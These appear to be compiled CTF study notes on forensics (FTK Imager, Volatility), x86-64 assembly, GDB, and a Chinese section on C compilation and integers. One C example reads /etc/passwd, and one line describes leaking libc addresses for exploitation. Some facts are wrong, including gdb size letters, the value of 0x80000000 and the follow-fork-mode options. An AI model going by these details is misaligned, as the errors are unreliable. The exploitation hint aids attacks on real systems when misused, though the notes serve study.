To prevent write access to the disk, you can use a write blocker. It’s also common to calculate a cryptographic hash of the entire disk when imaging it. “Commonly-used cryptographic hashes are MD5, SHA1, and/or SHA256,” said Wikipedia. “By recalculating the integrity hash at a later time, one can determine if the data in the disk image has been changed. This by itself does not protect against intentional tampering, but it can indicate that the data was altered, e.g. due to corruption.”

Why image a disk? Forensic imaging: - Prevents tampering with the original data evidence - Allows you to play around with the copy, without worrying about messing up the original

Forensic Image Extraction Example

This example uses the tool AccessData FTK Imager.

Step 1: Go to File > Create Disk Image

File Image Demo

Step 2: Select Physical Drive, because the USB or hard drive you’re imaging is a physical device or drive.

File Image Demo

Step 3: Select the drive you’re imaging. The 1000 GB is my computer hard drive; the 128 MB is the USB that I want to image.

File Image Demo

Step 4: Add a new image destination

File Image Demo

Step 5: Select whichever image type you want. Choose Raw (dd) if you’re a beginner, since it’s the most common type

File Image Demo

Step 6: Fill in all the evidence information

File Image Demo

Step 7: Choose where you want to store it

File Image Demo

Step 8: The image destination has been added. Now you can start the image extraction

File Image Demo

Step 9: Wait for the image to be extracted

File Image Demo

Step 10: This is the completed extraction

File Image Demo

Step 11: Add the image you just created so that you can view it

File Image Demo

Step 12: This time, choose the image file, since that’s what you just created

File Image Demo

Step 13: Enter the path of the image you just created

File Image Demo

Step 14: View the image.

Evidence tree Structure of the drive image
File list List of all the files in the drive image folder
Properties Properties of the file/folder being examined
Hex viewer View of the drive/folders/files in hexadecimal

File Image Demo

Step 15: To view files in the USB, go to Partition 1 > [USB name] > [root] in the Evidence Tree and look in the File List

File Image Demo

Step 16: Selecting fileA, fileB, fileC, or fileD gives us some properties of the files & a preview of each photo

File Image Demo

Step 17: Extract files of interest for further analysis by selecting, right-clicking, and choosing Export Files

File Image Demo

Memory Forensics

There are plenty of traces of someone's activity on a computer, but perhaps some of the most valuable information can be found within memory dumps, that is images taken of RAM. These dumps of data are often very large but can be analyzed using a tool called Volatility

Volatility Basics

Memory forensics isn't all that complicated, the hardest part would be using your toolset correctly. A good workflow is as follows:

Run strings for clues
Identify the image profile (which OS, version, etc.)
Dump processes and look for suspicious processes
Dump data related interesting processes
View data in a format relating to the process (Word: docx, Notepad: txt, Photoshop: psd, etc.)

Profile Identification

To properly use Volatility you must supply a profile with --profile=PROFILE, therefore before any sleuthing, you need to determine the profile using imageinfo:

$ python vol.py -f ~/image.raw imageinfo
Volatility Foundation Volatility Framework 2.4
Determining profile based on KDBG search...

          Suggested Profile(s) : Win7SP0x64, Win7SP1x64, Win2008R2SP0x64, Win2008R2SP1x64
                     AS Layer1 : AMD64PagedMemory (Kernel AS)
                     AS Layer2 : FileAddressSpace (/Users/Michael/Desktop/win7_trial_64bit.raw)
                      PAE type : PAE
                           DTB : 0x187000L
                          KDBG : 0xf80002803070
          Number of Processors : 1
     Image Type (Service Pack) : 0
                KPCR for CPU 0 : 0xfffff80002804d00L
             KUSER_SHARED_DATA : 0xfffff78000000000L
           Image date and time : 2012-02-22 11:29:02 UTC+0000
     Image local date and time : 2012-02-22 03:29:02 -0800

Dump Processes

To view processes, the pslist or pstree, or psscan command can be used.

$ python vol.py -f ~/image.raw pslist --profile=Win7SP0x64 pstree
Volatility Foundation Volatility Framework 2.5
Offset(V)          Name                    PID   PPID   Thds     Hnds   Sess  Wow64 Start                          Exit
------------------ -------------------- ------ ------ ------ -------- ------ ------ ------------------------------ ------------------------------
0xffffa0ee12532180 System                    4      0    108        0 ------      0 2018-04-22 20:02:33 UTC+0000
0xffffa0ee1389d040 smss.exe                232      4      3        0 ------      0 2018-04-22 20:02:33 UTC+0000
...
0xffffa0ee128c6780 VBoxTray.exe           3324   1123     10        0      1      0 2018-04-22 20:02:55 UTC+0000
0xffffa0ee14108780 OneDrive.exe           1422   1123     10        0      1      1 2018-04-22 20:02:55 UTC+0000
0xffffa0ee14ade080 svchost.exe             228    121      1        0      1      0 2018-04-22 20:14:43 UTC+0000
0xffffa0ee1122b080 notepad.exe            2019   1123      1        0      1      0 2018-04-22 20:14:49 UTC+0000

Process Memory Dump

Dumping the memory of a process can prove to be fruitful, say we want to dump the data from notepad.exe:

$ python vol.py -f ~/image.raw --profile=Win7SP0x64 memdump -p 2019 -D dump/
Volatility Foundation Volatility Framework 2.4
************************************************************************
Writing System [     2019] to 2019.dmp

$ ls -alh dump/2019.dmp
-rw-r--r--  1 user  staff   111M Apr 22 20:47 dump/2019.dmp

Other Useful Commands

There are plenty of commands that Volatility offers but some highlights include:

$ python vol.py -f IMAGE --profile=PROFILE connections: view network connections
$ python vol.py -f IMAGE --profile=PROFILE cmdscan: view commands that were run in cmd prompt

Hex Editor

A hexadecimal (hex) editor (also called a binary file editor or byte editor) is a computer program you can use to manipulate the fundamental binary data that constitutes a computer file. The name “hex” comes from “hexadecimal,” a standard numerical format for representing binary data. A typical computer file occupies multiple areas on the platter(s) of a disk drive, whose contents are combined to form the file. Hex editors that are designed to parse and edit sector data from the physical segments of floppy or hard disks are sometimes called sector editors or disk editors. A hex editor is used to see or edit the raw, exact contents of a file. Hex editors may be used to correct data corrupted by a system or application. A list of editors can be found on the forensics Wiki. You can download one and install it on your system.

Example

Open fileA.jpg in a hex editor. (Most Hex editors have either a “File > Open” option or a simple drag and drop.)

fileA

When you open fileA.jpg in your hex editor, you should see something similar to this:

Hexadecimal Editor Screenshot

Your hex editor should also have a “go to” or “find” feature so you can jump to a specific byte.

Reverse Engineering

https://ctf101.org/reverse-engineering/overview/

Reverse Engineering in a CTF is typically the process of taking a compiled (machine code, bytecode) program and converting it back into a more human-readable format.

Very often the goal of a reverse engineering challenge is to understand the functionality of a given program such that you can identify deeper issues.

Assembly / Machine Code
The C Programming Language
Disassemblers
Decompilers

Assembly/Machine Code

Machine Code or Assembly is code that has been formatted for direct execution by a CPU. Machine Code is why readable programming languages like C, when compiled, cannot be reversed into source code (well Decompilers can sort of, but more on that later).

From Source to Compilation

Godbolt shows the differences in machine code generated by various compilers.

For example, if we have a simple C++ function:

#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>

int main() {
    char c;
    int fd = syscall(2, "/etc/passwd", 0);
    while (syscall(0, fd, &c, 1)) {
        putchar(c);
    }
}

We can see the compilation results in some verbose instructions for the CPU:

.LC0:
  .string "/etc/passwd"
main:
  push rbp
  mov rbp, rsp
  sub rsp, 16
  mov edx, 0
  mov esi, OFFSET FLAT:.LC0
  mov edi, 2
  mov eax, 0
  call syscall
  mov DWORD PTR [rbp-4], eax
.L3:
  lea rdx, [rbp-5]
  mov eax, DWORD PTR [rbp-4]
  mov ecx, 1
  mov esi, eax
  mov edi, 0
  mov eax, 0
  call syscall
  test rax, rax
  setne al
  test al, al
  je .L2
  movzx eax, BYTE PTR [rbp-5]
  movsx eax, al
  mov edi, eax
  call putchar
  jmp .L3
.L2:
  mov eax, 0
  leave
  ret

This is a one-way process for compiled languages as there is no way to generate sources from machine code. While the machine code may seem unintelligible, the extremely basic functions can be interpreted with some practice.

x86-64

x86-64 or amd64 or i64 is a 64-bit Complex Instruction Set Computing (CISC) architecture. This basically means that the registers used for this architecture extend an extra 32 bits on Intel's x86 architecture. CISC means that a single instruction can do a bunch of different things at once such as memory accesses, register reads, etc. It is also a variable-length instruction set which means different instructions can be of diferent sizes ranging from 1 to 16 bytes long. And finally, x86-64 allows for multi-sized register access which means that you can access certain parts of a register that are different sizes.

x86-64 Registers

x86-64 registers behave similarly to other architectures. A key component of x86-64 registers is multi-sized access, meaning the register RAX can have its lower 32-bits accessed with EAX. The next lower 16 bits can be accessed with AX and the lowest 8 bits can be accessed with AL, allowing the computer to make optimizations that boost program execution. Multi-access Register

x86-64 has plenty of registers, including rax, rbx, rcx, rdx, rdi, rsi, rsp, rip, r8-r15, and more! But some registers serve special purposes.

The special registers include: - RIP: the instruction pointer - RSP: the stack pointer - RBP: the base pointer

Instructions

An instruction represents a single operation for the CPU to perform.

There are different types of instructions including:

Data movement: mov rax, [rsp - 0x40]
Arithmetic: add rbx, rcx
Control-flow: jne 0x8000400

Because x86-64 is a CISC architecture, instructions can be quite complex for machine code such as repne scasb which repeats up to ECX times over memory at EDI looking for NULL byte (0x00), decrementing ECX each byte (Essentially strlen() in a single instruction!)

It is important to remember that an instruction really is just memory, this idea will become useful with Return Oriented Programming or ROP.

Instructions, numbers, strings, everything! Always represented in hex.

add rax, rbx
mov rax, 0xdeadbeef
mov rax, [0xdeadbeef] == 67 48 8b 05 ef be ad de
"Hello" == 48 65 6c 6c 6f
== 48 01 d8
== 48 c7 c0 ef be ad de

Execution

What should the CPU execute? This is determined by the RIP register where IP means instruction pointer. Execution follows the pattern: fetch the instruction at the address in RIP, decode it, and run it.

Examples

mov rax, 0xdeadbeef

Here the operation mov is moving the "immediate" 0xdeadbeef into the register RAX

mov rax, [0xdeadbeef + rbx * 4]

Here the operation mov is moving the data at the address of [0xdeadbeef + RBX*4] into the register RAX. When brackets are used, you can think of the program as getting the content from that effective address.

Example Execution

-> 0x0804000: mov eax, 0xdeadbeef            Register Values:
   0x0804005: mov ebx, 0x1234                RIP = 0x0804000
   0x080400a: add, rax, rbx                  RAX = 0x0
   0x080400d: inc rbx                        RBX = 0x0
   0x0804010: sub rax, rbx                   RCX = 0x0
   0x0804013: mov rcx, rax                   RDX = 0x0
   0x0804000: mov eax, 0xdeadbeef            Register Values:
-> 0x0804005: mov ebx, 0x1234                RIP = 0x0804005
   0x080400a: add, rax, rbx                  RAX = 0xdeadbeef
   0x080400d: inc rbx                        RBX = 0x0
   0x0804010: sub rax, rbx                   RCX = 0x0
   0x0804013: mov rcx, rax                   RDX = 0x0
   0x0804000: mov eax, 0xdeadbeef            Register Values:
   0x0804005: mov ebx, 0x1234                RIP = 0x080400a
-> 0x080400a: add, rax, rbx                  RAX = 0xdeadbeef
   0x080400d: inc rbx                        RBX = 0x1234
   0x0804010: sub rax, rbx                   RCX = 0x0
   0x0804013: mov rcx, rax                   RDX = 0x0
   0x0804000: mov eax, 0xdeadbeef            Register Values:
   0x0804005: mov ebx, 0x1234                RIP = 0x080400d
   0x080400a: add, rax, rbx                  RAX = 0xdeadd123
-> 0x080400d: inc rbx                        RBX = 0x1234
   0x0804010: sub rax, rbx                   RCX = 0x0
   0x0804013: mov rcx, rax                   RDX = 0x0
   0x0804000: mov eax, 0xdeadbeef            Register Values:
   0x0804005: mov ebx, 0x1234                RIP = 0x0804010
   0x080400a: add, rax, rbx                  RAX = 0xdeadd123
   0x080400d: inc rbx                        RBX = 0x1235
-> 0x0804010: sub rax, rbx                   RCX = 0x0
   0x0804013: mov rcx, rax                   RDX = 0x0
   0x0804000: mov eax, 0xdeadbeef            Register Values:
   0x0804005: mov ebx, 0x1234                RIP = 0x0804013
   0x080400a: add, rax, rbx                  RAX = 0xdeadbeee
   0x080400d: inc rbx                        RBX = 0x1235
   0x0804010: sub rax, rbx                   RCX = 0x0
-> 0x0804013: mov rcx, rax                   RDX = 0x0
   0x0804000: mov eax, 0xdeadbeef            Register Values:
   0x0804005: mov ebx, 0x1234                RIP = 0x0804005
   0x080400a: add, rax, rbx                  RAX = 0xdeadbeee
   0x080400d: inc rbx                        RBX = 0x1235
   0x0804010: sub rax, rbx                   RCX = 0xdeadbeee
   0x0804013: mov rcx, rax                   RDX = 0x0

Control Flow

How can we express conditionals in x86-64? We use conditional jumps such as:

jnz <address>
je <address>
jge <address>
jle <address>
etc.

They jump if their condition is true and just go to the next instruction otherwise. These conditionals are checking EFLAGS which are special registers that store flags on certain instructions such as add rax, rbx which sets the o (overflow) flag if the sum is greater than a 64-bit register can hold, and wraps around. You can jump based on that with a jo instruction. The most important thing to remember is the cmp instruction:

cmp rax, rbx
jle error

This assembly jumps if RAX <= RBX

Addresses

Memory acts similarly to a big array where the indices of this "array" are memory addresses. Remember from earlier:

mov rax, [0xdeadbeef]

The square brackets mean "get the data at this address". This is analogous to the C/C++ syntax: rax = *0xdeadbeef;

Disassemblers

A disassembler is a tool that breaks down a compiled program into machine code.

List of Disassemblers

IDA
Binary Ninja
GNU Debugger (GDB)
radare2
Hopper

IDA

The Interactive Disassembler (IDA) is the industry standard for binary disassembly. IDA is capable of disassembling "virtually any popular file format". This makes it very useful to security researchers and CTF players who often need to analyze obscure files without knowing what they are or where they came from. IDA also features the industry-leading Hex-Rays decompiler which can convert assembly code back into a pseudo code-like format.

IDA

IDA also has a plugin interface which has been used to create some successful plugins that can make reverse engineering easier:

https://github.com/google/binnavi
https://github.com/yegord/snowman
https://github.com/gaasedelen/lighthouse
https://github.com/joxeankoret/diaphora
https://github.com/REhints/HexRaysCodeXplorer
https://github.com/osirislab/Fentanyl

Binary Ninja

Binary Ninja is an up-and-coming disassembler that attempts to bring a new, more programmatic approach to reverse engineering. Binary Ninja brings an improved plugin API and modern features to reverse engineering. While it's less popular or as old as IDA, Binary Ninja (often called binja) is quickly gaining ground and has a small community of dedicated users and followers.

Binja

Binja also has some community-contributed plugins which are collected here: https://github.com/Vector35/community-plugins

gdb

The GNU Debugger is a free and open-source debugger that also disassembles programs. It's capable as a disassembler, but most notably it is used by CTF players for its debugging and dynamic analysis capabilities.

gdb is often used in tandem with enhancement scripts like peda, pwndbg, and GEF

GDB

The GNU Debugger (GDB)

The GNU Debugger or GDB is a powerful debugger that allows for the step-by-step execution of a program. It can be used to trace program execution and is an important part of any reverse engineering toolkit.

Vanilla GDB

GDB without any modifications is unintuitive and obscures a lot of useful information. The plug-in pwndb solves a lot of these problems and makes for a much more pleasant experience. But if you are constrained and have to use vanilla gdb, here are several things to make your life easier.

Starting GDB

To execute GBD and attach it to a program simply run gdb [program]

Disassembly

(gdb) disassemble [address/symbol] will display the disassembly for that function/frame

GDB will autocomplete functions, so saying (gdb) disas main suffices if you'd like to see the disassembly of the main

View Disassembly During Execution

Another handy thing to see while stepping through a program is the disassembly of nearby instructions:

(gdb) display/[# of instructions]i $pc [± offset]

display shows data with each step
/[#]i shows how much data in the format i for instruction
$pc means the pc, program counter, register
[± offset] allows you to specify how you would like the data offset from the current instruction

Example Usage

(gdb) display/10i $pc - 0x5

This command will show 10 instructions on screen with an offset from the next instruction of 5, giving us this display:

   0x8048535 <main+6>:  lock pushl -0x4(%ecx)
   0x8048539 <main+10>: push   %ebp
=> 0x804853a <main+11>: mov    %esp,%ebp
   0x804853c <main+13>: push   %ecx
   0x804853d <main+14>: sub    $0x14,%esp
   0x8048540 <main+17>: sub    $0xc,%esp
   0x8048543 <main+20>: push   $0x400
   0x8048548 <main+25>: call   0x80483a0 <malloc@plt>
   0x804854d <main+30>: add    $0x10,%esp
   0x8048550 <main+33>: sub    $0xc,%esp

Deleting Views

If for whatever reason, a view no long suits your needs simply call (gdb) info display which will give you a list of active displays:

Auto-display expressions now in effect:
Num Enb Expression
1:   y  /10bi $pc-0x5

Then simply execute (gdb) delete display 1 and your execution will resume without the display.

Registers

In order to view the state of registers with vanilla gdb, you need to run the command info registers which will display the state of all the registers:

eax            0xf77a6ddc   -142971428
ecx            0xffe06b10   -2069744
edx            0xffe06b34   -2069708
ebx            0x0  0
esp            0xffe06af8   0xffe06af8
ebp            0x0  0x0
esi            0xf77a5000   -142979072
edi            0xf77a5000   -142979072
eip            0x804853a    0x804853a <main+11>
eflags         0x286    [ PF SF IF ]
cs             0x23 35
ss             0x2b 43
ds             0x2b 43
es             0x2b 43
fs             0x0  0
gs             0x63 99

If you simply would like to see the contents of a single register, the notation x/x $[register] where:

x/x means to display the address in hex notation
$[register] is the register code such as eax, rax, etc.

Pwndbg

These commands work with vanilla gdb as well.

Setting Breakpoints

Setting breakpoints in GDB uses the format b*[Address/Symbol]

Example Usage

(gdb) b*main: Break at the start
(gdb) b*0x804854d: Break at 0x804854d
(gdb) b*0x804854d-0x100: Break at 0x804844d

Deleting Breakpoints

As before, in order to delete a view, you can list the available breakpoints using (gdb) info breakpoints (don't forget about GDB's autocomplete, you don't always need to type out every command!) which will display all breakpoints:

Num     Type           Disp Enb Address    What
1       breakpoint     keep y   0x0804852f <main>
3       breakpoint     keep y   0x0804864d <__libc_csu_init+61>

Then simply execute (gdb) delete 1

Note

GDB creates breakpoints chronologically and does NOT reuse numbers.

Stepping

What good is a debugger if you can't control where you are going? In order to begin the execution of a program, use the command r [arguments] similar to how if you ran it with dot-slash notation you would execute it ./program [arguments]. In this case, the program will run normally and if no breakpoints are set, you will execute normally. If you have breakpoints set, you will stop at that instruction.

(gdb) continue [# of breakpoints]: Resumes the execution of the program until it finishes or until another breakpoint is hit (shorthand c)
(gdb) step[# of instructions]: Steps into an instruction the specified number of times, default is 1 (shorthand s)
(gdb) next instruction [# of instructions]: Steps over an instruction meaning it will not delve into called functions (shorthand ni)
(gdb) finish: Finishes a function and breaks after it gets returned (shorthand fin)

Examining

Examining data in GDB is also very useful for seeing how the program is affecting data. The notation may seem complex at first, but it is flexible and provides powerful functionality.

(gdb) x/[#][size][format] [Address/Symbol/Register][± offset]

x/ means examine
[#] means how much
[size] means what size the data should be such as a word w (2 bytes), double word d (4 bytes), or giant word g (8 bytes)
[format] means how the data should be interpreted such as an instruction i, a string s, hex bytes x
[Address/Symbol][± offset] means where to start interpreting the data

Example Usage

(gdb) x/x $rax: Displays the content of the register RAX as hex bytes
(gdb) x/i 0xdeadbeef: Displays the instruction at address 0xdeadbeef
(gdb) x/10s 0x893e10: Displays 10 strings at the address
(gdb) x/10gx 0x7fe10: Displays 10 giant words as hex at the address

Forking

If the program happens to be an accept-and-fork server, gdb will have issues following the child or parent processes. In order to specify how you want gdb to function you can use the command set follow-fork-mode [on/off]

Setting Data

If you would like to set data at any point, it is possible using the command set [Address/Register]=[Hex Data]

Example Usage

set $rax=0x0: Sets the register rax to 0
set 0x1e4a70=0x123: Sets the data at 0x1e4a70 to 0x123

Process Mapping

A handy way to find the process's mapped address spaces is to use info proc map:

Mapped address spaces:

    Start Addr   End Addr       Size     Offset objfile
     0x8048000  0x8049000     0x1000        0x0 /directory/program
     0x8049000  0x804a000     0x1000        0x0 /directory/program
     0x804a000  0x804b000     0x1000     0x1000 /directory/program
    0xf75cb000 0xf75cc000     0x1000        0x0
    0xf75cc000 0xf7779000   0x1ad000        0x0 /lib32/libc-2.23.so
    0xf7779000 0xf777b000     0x2000   0x1ac000 /lib32/libc-2.23.so
    0xf777b000 0xf777c000     0x1000   0x1ae000 /lib32/libc-2.23.so
    0xf777c000 0xf7780000     0x4000        0x0
    0xf778b000 0xf778d000     0x2000        0x0 [vvar]
    0xf778d000 0xf778f000     0x2000        0x0 [vdso]
    0xf778f000 0xf77b1000    0x22000        0x0 /lib32/ld-2.23.so
    0xf77b1000 0xf77b2000     0x1000        0x0
    0xf77b2000 0xf77b3000     0x1000    0x22000 /lib32/ld-2.23.so
    0xf77b3000 0xf77b4000     0x1000    0x23000 /lib32/ld-2.23.so
    0xffc59000 0xffc7a000    0x21000        0x0 [stack]

This will show you where the stack, heap (if there is one), and libc are located.

Attaching Processes

Another useful feature of GDB is to attach to processes that are already running. Simply launch gdb using gdb, then find the process id of the program you would like to attach to an execute attach [pid].

逆向工程与汇编语言

C 语言基础

从源代码到可执行文件

我们以经典著作《The C Programming Language》中的第一个程序 “Hello World” 为例，讲解 Linux 下 GCC 的编译过程。

#include <stdio.h>
main()
{
    printf("hello, world\n");
}
$gcc hello.c
$./a.out
hello world

以上过程可分为4个步骤：预处理（Preprocessing）、编译（Compilation）、汇编（Assembly）和链接（Linking）。

预编译

gcc -E hello.c -o hello.i
# 1 "hello.c"
# 1 "<built-in>"
# 1 "<command-line>"
......
extern int printf (const char *__restrict __format, ...);
......
main() {
 printf("hello, world\n");
}

预编译过程主要处理源代码中以 “#” 开始的预编译指令：

将所有的 “#define” 删除，并且展开所有的宏定义。
处理所有条件预编译指令，如 “#if”、“#ifdef”、“#elif”、“#else”、“#endif”。
处理 “#include” 预编译指令，将被包含的文件插入到该预编译指令的位置。注意，该过程递归执行。
删除所有注释。
添加行号和文件名标号。
保留所有的 #pragma 编译器指令。

编译

gcc -S hello.c -o hello.s
        .file   "hello.c"
        .section        .rodata
.LC0:
        .string "hello, world"
        .text
        .globl  main
        .type   main, @function
main:
.LFB0:
        .cfi_startproc
        pushq   %rbp
        .cfi_def_cfa_offset 16
        .cfi_offset 6, -16
        movq    %rsp, %rbp
        .cfi_def_cfa_register 6
        leaq    .LC0(%rip), %rdi
        call    puts@PLT
        movl    $0, %eax
        popq    %rbp
        .cfi_def_cfa 7, 8
        ret
        .cfi_endproc
.LFE0:
        .size   main, .-main
        .ident  "GCC: (GNU) 7.2.0"
        .section        .note.GNU-stack,"",@progbits

编译过程就是把预处理完的文件进行一系列词法分析、语法分析、语义分析及优化后生成相应的汇编代码文件。

汇编

$ gcc -c hello.s -o hello.o
或者
$gcc -c hello.c -o hello.o
$ objdump -sd hello.o

hello.o:     file format elf64-x86-64

Contents of section .text:
 0000 554889e5 488d3d00 000000e8 00000000  UH..H.=.........
 0010 b8000000 005dc3                      .....].
Contents of section .rodata:
 0000 68656c6c 6f2c2077 6f726c64 00        hello, world.
Contents of section .comment:
 0000 00474343 3a202847 4e552920 372e322e  .GCC: (GNU) 7.2.
 0010 3000                                 0.
Contents of section .eh_frame:
 0000 14000000 00000000 017a5200 01781001  .........zR..x..
 0010 1b0c0708 90010000 1c000000 1c000000  ................
 0020 00000000 17000000 00410e10 8602430d  .........A....C.
 0030 06520c07 08000000                    .R......

Disassembly of section .text:

0000000000000000 <main>:
   0:   55                      push   %rbp
   1:   48 89 e5                mov    %rsp,%rbp
   4:   48 8d 3d 00 00 00 00    lea    0x0(%rip),%rdi        # b <main+0xb>
   b:   e8 00 00 00 00          callq  10 <main+0x10>
  10:   b8 00 00 00 00          mov    $0x0,%eax
  15:   5d                      pop    %rbp
  16:   c3                      retq

汇编器将汇编代码转变成机器可以执行的指令。

链接

gcc hello.o -o hello
$ objdump -d -j .text hello
......
000000000000064a <main>:
 64a:   55                      push   %rbp
 64b:   48 89 e5                mov    %rsp,%rbp
 64e:   48 8d 3d 9f 00 00 00    lea    0x9f(%rip),%rdi        # 6f4 <_IO_stdin_used+0x4>
 655:   e8 d6 fe ff ff          callq  530 <puts@plt>
 65a:   b8 00 00 00 00          mov    $0x0,%eax
 65f:   5d                      pop    %rbp
 660:   c3                      retq
 661:   66 2e 0f 1f 84 00 00    nopw   %cs:0x0(%rax,%rax,1)
 668:   00 00 00
 66b:   0f 1f 44 00 00          nopl   0x0(%rax,%rax,1)
......

目标文件需要链接一大堆文件才能得到最终的可执行文件（上面只展示了链接后的 main 函数，可以和 hello.o 中的 main 函数作对比）。链接过程主要包括地址和空间分配（Address and Storage Allocation）、符号决议（Symbol Resolution）和重定向（Relocation）等。

gcc 技巧

通常在编译后只会生成一个可执行文件，而中间过程生成的 .i、.s、.o 文件都不会被保存。我们可以使用参数 -save-temps 永久保存这些临时的中间文件。

$ gcc -save-temps hello.c
$ ls
a.out hello.c  hello.i  hello.o  hello.s

这里要注意的是，gcc 默认使用动态链接，所以这里生成的 a.out 实际上是共享目标文件。

$ file a.out
a.out: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=533aa4ca46d513b1276d14657ec41298cafd98b1, not stripped

使用参数 --verbose 可以输出 gcc 详细的工作流程。

gcc hello.c -static --verbose

东西很多，我们主要关注下面几条信息：

$ /usr/lib/gcc/x86_64-pc-linux-gnu/7.2.0/cc1 -quiet -v hello.c -quiet -dumpbase hello.c -mtune=generic -march=x86-64 -auxbase hello -version -o /tmp/ccj1jUMo.s

as -v --64 -o /tmp/ccAmXrfa.o /tmp/ccj1jUMo.s

/usr/lib/gcc/x86_64-pc-linux-gnu/7.2.0/collect2 -plugin /usr/lib/gcc/x86_64-pc-linux-gnu/7.2.0/liblto_plugin.so -plugin-opt=/usr/lib/gcc/x86_64-pc-linux-gnu/7.2.0/lto-wrapper -plugin-opt=-fresolution=/tmp/cc1l5oJV.res -plugin-opt=-pass-through=-lgcc -plugin-opt=-pass-through=-lgcc_eh -plugin-opt=-pass-through=-lc --build-id --hash-style=gnu -m elf_x86_64 -static /usr/lib/gcc/x86_64-pc-linux-gnu/7.2.0/../../../../lib/crt1.o /usr/lib/gcc/x86_64-pc-linux-gnu/7.2.0/../../../../lib/crti.o /usr/lib/gcc/x86_64-pc-linux-gnu/7.2.0/crtbeginT.o -L/usr/lib/gcc/x86_64-pc-linux-gnu/7.2.0 -L/usr/lib/gcc/x86_64-pc-linux-gnu/7.2.0/../../../../lib -L/lib/../lib -L/usr/lib/../lib -L/usr/lib/gcc/x86_64-pc-linux-gnu/7.2.0/../../.. /tmp/ccAmXrfa.o --start-group -lgcc -lgcc_eh -lc --end-group /usr/lib/gcc/x86_64-pc-linux-gnu/7.2.0/crtend.o /usr/lib/gcc/x86_64-pc-linux-gnu/7.2.0/../../../../lib/crtn.o

三条指令分别是 cc1、as 和 collect2，cc1 是 gcc 的编译器，将 .c 文件编译为 .s 文件，as 是汇编器命令，将 .s 文件汇编成 .o 文件，collect2 是链接器命令，它是对命令 ld 的封装。静态链接时，gcc 将 C 语言运行时库的 5 个重要目标文件 crt1.o、crti.o、crtbeginT.o、crtend.o、crtn.o 和 -lgcc、-lgcc_eh、-lc 表示的 3 个静态库链接到可执行文件中。

更多的内容我们会在 1.5.3 中专门对 ELF 文件进行讲解。

C 语言标准库

C 运行库（CRT）是一套庞大的代码库，以支撑程序能够正常地运行。其中 C 语言标准库占据了最主要地位。

常用的标准库文件头：

标准输入输出（stdio.h）
字符操作（ctype.h）
字符串操作（string.h）
数学函数（math.h）
实用程序库（stdlib.h）
时间／日期（time.h）
断言（assert.h）
各种类型上的常数（limits.h & float.h）
变长参数（stdarg.h）
非局部跳转（setjmp.h）

glibc 即 GNU C Library，是为 GNU 操作系统开发的一个 C 标准库。glibc 主要由两部分组成，一部分是头文件，位于 /usr/include；另一部分是库的二进制文件。二进制文件部分主要是 C 语言标准库，有动态和静态两个版本，动态版本位于 /lib/libc.so.6，静态版本位于 /usr/lib/libc.a。

在漏洞利用的过程中，通常我们通过计算目标函数地址相对于已知函数地址在同一个 libc 中的偏移，来获得目标函数的虚拟地址，这时我们需要让本地的 libc 版本和远程的 libc 版本相同，可以先泄露几个函数的地址，然后在 libcdb.com 中进行搜索来得到。

整数表示

默认情况下，C 语言中的数字是有符号数，下面我们声明一个有符号整数和无符号整数：

int var1 = 0;
unsigned int var2 = 0;

有符号整数
- 可以表示为正数或负数
- int 的范围：-2,147,483,648 ~ 2,147,483,647
无符号整数
- 只能表示为零或正数
- unsigned int 的范围：0 ~ 4,294,967,295

signed 或者 unsigned 取决于整数类型是否可以携带标志 +/-：

Signed
- int
- signed int
- long
Unsigned
- unit
- unsigned int
- unsigned long

在 signed int 中，二进制最高位被称作符号位，符号位被设置为 1 时，表示值为负，当设置为 0 时，值为非负：

0x7FFFFFFF = 2147493647
- 01111111111111111111111111111111
0x80000000 = -2147483647
- 10000000000000000000000000000000
0xFFFFFFFF = -1
- 11111111111111111111111111111111

二进制补码以一种适合于二进制加法器的方式来表示负数，当一个二进制补码形式表示的负数和与它的绝对值相等的正数相加时，结果为 0。首先以二进制方式写出正数，然后对所有位取反，最后加 1 就可以得到该数的二进制补码：

eg: 0x00123456
  = 1193046
  = 00000000000100100011010001010110
 ~= 11111111111011011100101110101001
 += 11111111111011011100101110101010
  = -1193046 (0xFFEDCBAA)

编译器需要根据变量类型信息编译成相应的指令：

有符号指令
- IDIV：带符号除法指令
- IMUL：带符号乘法指令
- SAL：算术左移指令（保留符号）
- SAR：右移右移指令（保留符号）
- MOVSX：带符号扩展传送指令
- JL：当小于时跳转指令
- JLE：当小于或等于时跳转指令
- JG：当大于时跳转指令
- JGE：当大于或等于时跳转指令
无符号指令
- DIV：除法指令
- MUL：乘法指令
- SHL：逻辑左移指令
- SHR：逻辑右移指令
- MOVZX：无符号扩展传送指令
- JB：当小于时跳转指令
- JBE：当小于或等于时跳转指令
- JA：当大于时跳转指令
- JAE：当大于或等于时跳转指令

32 位机器上的整型数据类型，不同的系统可能会有不同：

C 数据类型	最小值	最大值	最小大小
char	-128	127	8 bits
short	-32 768	32 767	16 bits
int	-2 147 483 648	2 147 483 647	16 bits
long	-2 147 483 648	2 147 483 647	32 bits
long long	-9 223 372 036 854 775 808	9 223 372 036 854 775 807	64 bits

固定大小的数据类型：

```
int [# of bits]_t
```
- int8_t, int16_t, int32_t
uint[# of bits]_t
- uint8_t, uint16_t, uint32_t
有符号整数
无符号整数

更多信息在 stdint.h 和 limits.h 中：

man stdint.h
cat /usr/include/stdint.h
man limits.h
cat /usr/include/limits.h

了解整数的符号和大小是很有用的，在后面的相关章节中我们会介绍整数溢出的内容。

格式化输出函数

C 标准中定义了下面的格式化输出函数（参考 man ３ printf）：

#include <stdio.h>

int printf(const char *format, ...);
int fprintf(FILE *stream, const char *format, ...);
int dprintf(int fd, const char *format, ...);
int sprintf(char *str, const char *format, ...);
int snprintf(char *str, size_t size, const char *format, ...);

#include <stdarg.h>

int vprintf(const char *format, va_list ap);
int vfprintf(FILE *stream, const char *format, va_list ap);
int vdprintf(int fd, const char *format, va_list ap);
int vsprintf(char *str, const char *format, va_list ap);
int vsnprintf(char *str, size_t size, const char *format, va_list ap);

fprintf() 按照格式字符串的内容将输出写入流中。三个参数为流、格式字符串和变参列表。
printf() 等同于 fprintf()，但是它假定输出流为 stdout。
sprintf() 等同于 fprintf()，但是输出不是写入流而是写入数组。在写入的字符串末尾必须添加一个空字符。
snprintf() 等同于 sprintf()，但是它指定了可写入字符的最大值 size。当 size 大于零时，输出字符超过第 size-1 的部分会被舍弃而不会写入数组中，在写入数组的字符串末尾会添加一个空字符。
